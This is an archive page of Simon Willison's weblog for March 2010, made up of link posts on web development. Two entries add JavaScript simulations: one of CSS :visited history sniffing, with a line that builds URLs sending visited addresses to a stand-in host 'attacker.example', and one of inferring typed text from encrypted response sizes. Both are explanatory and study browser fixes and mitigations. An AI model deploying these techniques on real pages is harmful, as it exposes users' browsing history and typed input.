Simon Willison’s Weblog

Items in Mar, 2010


Plugging the CSS History Leak (via) Firefox is fixing the nefarious CSS visited-link history leak, which currently affects all browsers and allows a malicious site to determine whether you have visited a specific page by styling a link to it with :visited and then reading the applied style back through getComputedStyle. It’s an obtrusive but necessary fix: :visited will only be allowed to change colours (text, background, border and outline colours, so no background images and hence no more checkbox effects, since the image request itself could leak the answer to the attacker’s server), and getComputedStyle will report the unvisited colours regardless of history. I hope other browser vendors follow suit. # 31st March 2010, 8:01 pm
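The two leak vectors described above, and why the fix closes both, as an added simulation. This is not code from the original post or from Mozilla; the browser models, the history set and the candidate URLs are all constructed stand-ins for a real DOM so that it runs under Node without a browser.

```javascript
// Added illustration of CSS :visited history sniffing and of the Firefox fix.
// Constructed example: HISTORY and the two "browser" functions stand in for a
// real browser's history and its getComputedStyle implementation.

// The attacker's stylesheet: a { color: blue } a:visited { color: red }
const STYLESHEET = {
  unvisited: 'rgb(0, 0, 255)',
  visited: 'rgb(255, 0, 0)',
};

// Constructed browsing history for the simulated victim.
const HISTORY = new Set(['https://example.org/', 'https://bank.example/login']);

// Pre-fix browser: getComputedStyle honours :visited, so the colour that
// script can read depends on whether the user has been to `href`.
function leakyBrowser(href) {
  return { color: HISTORY.has(href) ? STYLESHEET.visited : STYLESHEET.unvisited };
}

// Patched browser: the link may still be painted red on screen, but
// getComputedStyle always reports the unvisited values, so script learns nothing.
function patchedBrowser(href) {
  return { color: STYLESHEET.unvisited };
}

// The sniffing loop a malicious page runs: one hidden <a href=...> per target
// URL, then compare the computed colour with the :visited rule.
function sniffHistory(candidates, getComputedStyle) {
  const visited = [];
  for (const href of candidates) {
    const style = getComputedStyle(href); // stands in for getComputedStyle(anchorElement)
    if (style.color === STYLESHEET.visited) visited.push(href);
  }
  return visited;
}

// Second vector: a:visited { background-image: url(https://attacker.example/log?...) }
// Pre-fix, the image is fetched only for visited links, so the attacker's web
// server log answers the question without any script at all. The fix forbids
// background images in :visited rules, so no request is ever made.
function imageRequestsFor(candidates, fixApplied) {
  if (fixApplied) return [];
  return candidates
    .filter((href) => HISTORY.has(href))
    .map((href) => `https://attacker.example/log?visited=${encodeURIComponent(href)}`);
}

const CANDIDATES = [
  'https://example.org/',
  'https://bank.example/login',
  'https://example.net/',
];

function demo() {
  return {
    leaky: sniffHistory(CANDIDATES, leakyBrowser),
    patched: sniffHistory(CANDIDATES, patchedBrowser),
    imageRequestsBefore: imageRequestsFor(CANDIDATES, false),
    imageRequestsAfter: imageRequestsFor(CANDIDATES, true),
  };
}

console.log(demo());
```

Against the leaky model the sniff recovers exactly the two visited URLs; against the patched model it recovers none, even though the user's history is unchanged, because the observable channel (the reported colour) no longer depends on it. The same reasoning applies to the image vector: removing the ability to trigger a request from :visited removes the server-side channel.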

Miss Wilson, when she was a resident superintendent in this Palace, had a cat that apparently caught up to 60 mice a night. The corpses were then swept up in the morning. Finally, does the noble Lord recognise the fire hazard that mice pose, because they eat through insulating cables? It would be a tragedy for this beautiful Palace to burn down for lack of a cat.

Baroness Finlay of Llandaff # 31st March 2010, 4:06 pm

Redis weekly update #3—Pub/Sub and more. Redis is now a publish/subscribe server—and it ended up only taking 150 lines of C code since Redis internals were already based on that paradigm. # 30th March 2010, 3:15 pm

A Turing Machine. Someone finally built a real Turing machine—and it’s beautiful. All calculations are carried out on a tape, which has 1s and 0s written on it by a robotic dry-erase marker. Hypnotic. # 29th March 2010, 2:28 pm

Preview: Freebase Gridworks (via) If my experience with government datasets has taught me anything, it’s that most datasets are collected by human beings (probably using Excel) and human beings are inconsistent. The first step in any data related project inevitably involves cleaning up the data. The Freebase team must run up against this all the time, and it looks like they’re tackling the problem head-on. Freebase Gridworks is just a screencast preview at the moment but an open source release is promised “within a month”—and the tool looks absolutely fantastic. DabbleDB-style data refactoring of spreadsheet data, running on your desktop but with the UI served in a browser. Full undo, a JavaScript-based expression language, powerful faceting and the ability to “reconcile” data against Freebase types (matching up country names, for example). I can’t wait to get my hands on this. # 27th March 2010, 6:43 pm

Random Guardian (via) A random page from today’s Guardian, built by Daniel Vydra. # 26th March 2010, 4:47 pm

We’ve got a rule of thumb inside Stamen that issue names must read like imperatives: “improve variable names”, “delete blah functionality”, “fix broken jimmy-jammers”, etc. Nothing focuses the mind of the reporter like being asked to specify what exactly they’d like to see done, and it’s much easier for a developer to scan a list with actual tasks right in the sentence construction.

Michal Migurski # 25th March 2010, 8:09 pm

The Onion Uses Django, And Why It Matters To Us. The Onion ported their main site from PHP and Drupal to Django in three months with a team of four developers, including a full migration of their archived content. Their developers answer questions about the switch in this thread on the Django sub-reddit. # 25th March 2010, 6:43 pm

Video on the Web—Dive Into HTML5. Everything a web developer needs to know about video containers, video codecs, audio containers, audio codecs, H.264, Theora, Vorbis, licensing, encoding, batch encoding and the HTML5 video element. # 24th March 2010, 12:50 am

The operations team is the one place with access to data and traffic that is “real-time enough” to detect business issues before they manifest in significant monetary loss. Traffic anomalies, chargeback rates, visitor retention… all these translate into money. This is what ops does; they make things work; they make the business work. And they spend a lot more time trending, investigating and analyzing than they do replacing hard drives and network cards.

Theo Schlossnagle # 24th March 2010, 12:43 am

Side-Channel Leaks in Web Applications. Interesting new security research. SSL encrypts the content of a web connection, but an eavesdropper can still see the size and timing of each HTTP request and response going back and forth—which can be enough to extract significant pieces of information, especially in applications that make a lot of small Ajax requests (an autocomplete box that fires a request per keystroke, for example, where the size of each response narrows down what was typed). # 23rd March 2010, 4:24 pm
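The attack shape described above, as an added simulation of an autocomplete widget that fires one Ajax request per keystroke, together with the padding mitigation the paper discusses. This is constructed example code, not code from the paper or from the original post; the word list, the alphabet, the block size and the search limit are assumptions.

```javascript
// Added illustration of the response-size side channel in encrypted Ajax
// traffic. Constructed example: WORDS is a toy suggestion dictionary and the
// observer is modelled as seeing only byte counts, never plaintext.

const WORDS = ['apple', 'apply', 'apricot', 'banana', 'band', 'bank', 'cherry'];
const ALPHABET = 'abcdefghijklmnopqrstuvwxyz';

// What the server returns for a typed prefix: matching suggestions as JSON.
function suggest(prefix) {
  return JSON.stringify(WORDS.filter((w) => w.startsWith(prefix)));
}

// Size of the unpadded response. TLS hides the bytes but not how many there are.
function responseSize(prefix) {
  return Buffer.byteLength(suggest(prefix), 'utf8');
}

// Mitigation: round every response up to a multiple of `block` bytes, so that
// many different prefixes produce the same observable size.
function paddedResponseSize(prefix, block = 32) {
  return Math.ceil(responseSize(prefix) / block) * block;
}

// What a passive observer on the network records while the victim types
// `word`: one response size per keystroke and nothing else.
function observe(word, sizeOf) {
  const sizes = [];
  for (let i = 1; i <= word.length; i++) sizes.push(sizeOf(word.slice(0, i)));
  return sizes;
}

// Attack: the observer can use the same public application, so it can learn
// sizeOf(prefix) for any prefix it likes. Extend candidate prefixes one
// character at a time, keeping only those consistent with the observed sizes.
// `limit` caps the candidate set so the padded case terminates as "ambiguous"
// instead of enumerating 26^n strings.
function recover(sizes, sizeOf, limit = 1000) {
  let candidates = [''];
  for (const size of sizes) {
    const next = [];
    for (const prefix of candidates) {
      for (const ch of ALPHABET) {
        const p = prefix + ch;
        if (sizeOf(p) === size) next.push(p);
      }
    }
    if (next.length > limit) return { candidates: next.slice(0, limit), ambiguous: true };
    candidates = next;
  }
  return { candidates, ambiguous: false };
}

function demo(word = 'bank') {
  return {
    leaked: recover(observe(word, responseSize), responseSize),
    padded: recover(observe(word, paddedResponseSize), paddedResponseSize),
  };
}

console.log(demo());
```

With unpadded responses the observer narrows the typed word to the two candidates "band" and "bank" from four byte counts alone; the last keystroke cannot be resolved because both final responses are the same length. Padding to 32-byte blocks makes every prefix in the toy dictionary produce an identical size, and the search blows up into thousands of equally consistent candidates. Padding is not free (it costs bandwidth and still leaks the number of requests), which is why the paper treats this as an open problem rather than a solved one.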

Fun with TextMate and PDB. TextMate bookmarks (against lines in a file) are stored as OS X extended attributes, which can be accessed from Python using the xattr module. Here’s a clever piece of code that uses bookmarks to set breakpoints in the command-line pdb debugger. # 23rd March 2010, 9:48 am

Using Django as a Pass Through Image Proxy (via) Neat idea for running development environments against data copied from a live production site—a static file serving handler which uses a local cache but copies in user-uploaded files from the production site the first time they are requested. # 22nd March 2010, 7:18 am

Fear and Loathing in Farmville. “At multiple times during the conference, [Daniel] James expressed his serious ethical qualms over the path social gaming was laying for the industry. So many of the methods for making money are thinly-veiled scams that simply exploit psychological flaws in the human brain.” # 21st March 2010, 10:13 am

Useful dynamic image generator for layout mockups—just drop an image into a page pointing at it. Takes optional arguments for text, colour and format as well. # 20th March 2010, 2:32 pm

Each speaker gets five minutes to explain their research, with a human metronome banging a waste bin with a big stick after every minute. After five minutes, an eight-year old girl (last night, actually two twins) walks across the stage and says “Please Stop, I’m Bored” and repeats it until the speaker does indeed stop.

Ian Mansfield # 19th March 2010, 11:07 am

webhook-relay. Another of my experiments with Node.js: webhook-relay is a self-contained queue and webhook request sending agent. Your application can POST to it specifying a webhook alert to be sent off, and webhook-relay will place that request in an in-memory queue and send it on its own time, avoiding the need for your main application server to block until the outgoing request has been processed. # 19th March 2010, 10:17 am

Twitter, reformatted. I wrote a Yahoo! Pipe to clean up Twitter’s RSS feeds—removing the username prefix and filtering out items that begin with “@” or “RT”. # 18th March 2010, 1:10 am

Simple online tool for unpacking and beautifying JavaScript. # 17th March 2010, 10:39 pm

If HTML is just another bytecode container and rendering runtime, we’ll have lost part of what made the web special, and I’m afraid HTML will lose to other formats by willingly giving up its differentiators and playing on their turf.

Alex Russell # 17th March 2010, 10:37 pm

The Web Server Benchmarking We Need. Ian Bicking asks for a WSGI benchmark which emphasises error handling over raw performance—can the server keep serving requests if some of them are CPU bound, I/O bound, wedged or cause a segfault? # 17th March 2010, 10:05 am

We spent $860,000 rebuilding our intranet. The most popular page on the intranet is still the cafeteria menu.

Intranet Secrets # 17th March 2010, 10:02 am

Internet Explorer Platform Preview Guide for Developers (via) Lots of SVG and CSS3 stuff, no mention of canvas here either though. # 16th March 2010, 6:36 pm

grant XXX on * ? (via) PostgreSQL doesn’t have a way to say “this user is allowed to select/update/etc on all tables in database X”. That kind of sucks. UPDATE: This is fixed in PostgreSQL 9.0, which adds GRANT ... ON ALL TABLES IN SCHEMA (and ALTER DEFAULT PRIVILEGES for tables created later), see the comments. # 16th March 2010, 6:26 pm

An Early Look At IE9 for Developers (via) Surprisingly, no mention of SVG or canvas and only a note in passing about HTML 5. # 16th March 2010, 6:11 pm

VMware: the new Redis home. Redis creator Salvatore Sanfilippo is joining VMware to work on Redis full time. Sounds like a good match. # 16th March 2010, 11:26 am

Automated deployments with Fabric—tips and tricks. “If it’s not in a Fabric fabfile, it’s not deployable”—I’m slowly applying this philosophy to my personal projects. # 16th March 2010, 11:19 am

Why Google MapMaker is not Open. Non-commercial use only, strict attribution requirements and you aren’t allowed to use the data for services that might compete with Google. This is why I’m disappointed every time I see Google encouraging people to contribute to Map Maker, especially in the developing world—if those people contributed to OpenStreetMap instead they would be building something far more valuable for their community. # 16th March 2010, 10:41 am

Installing PIL on Mac OS X Snow Leopard for use in Google App Engine. PIL installation instructions that actually work... the 'export CC="gcc -arch i386"' incantation in particular. Make sure you run install using the Python version that the App Engine dev tools are using (I ran "sudo /usr/bin/python2.6 install"). # 15th March 2010, 4:06 pm